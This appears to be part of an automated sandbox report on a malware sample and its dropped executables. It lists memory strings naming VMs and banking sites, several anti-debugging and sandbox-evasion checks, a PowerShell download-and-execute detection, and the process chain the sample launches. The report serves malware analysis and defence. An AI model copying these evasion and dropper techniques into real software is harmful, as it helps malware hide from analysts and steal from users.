Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware2p
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: RoamingIJEGHJECFC.exe, 00000005.00000003.2252768790.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: xVBoxService.exe
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.0000000002589000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: firefox.exe, 0000001F.00000002.2959579682.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2910203943.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107486000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: VBoxService.exe
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 0000001C.00000002.3349004818.00000000022BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0N
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: VMWare
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Code function: 5_2_04CB0100 rdtsc 5_2_04CB0100
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C70B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C70B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C8BAC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 7968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9fa327eb6c.exe PID: 4744, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGHJECFC.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAAKKKEBFCG.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe "C:\Users\user\AppData\RoamingIJEGHJECFC.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAAKKKEBFCG.exe "C:\Users\userAAKKKEBFCG.exe" Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: 8e8f4571c5.exe, 00000018.00000002.3307114026.0000000000622000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3307370321.0000000000622000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: userAAKKKEBFCG.exe, userAAKKKEBFCG.exe, 00000008.00000002.2309403161.000000000021F000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 0000000F.00000002.2347284132.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000010.00000002.2347343665.00000000005CF000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: firefox.exe, 0000001F.00000002.2949519005.000000114463B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: RoamingIJEGHJECFC.exe, RoamingIJEGHJECFC.exe, 00000005.00000002.2283548107.0000000000533000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, explorti.exe, 00000009.00000002.2317563389.0000000000793000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000B.00000002.2318335961.0000000000793000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 9Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B341 cpuid 0_2_6C70B341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Queries volume information: C:\ VolumeInformation
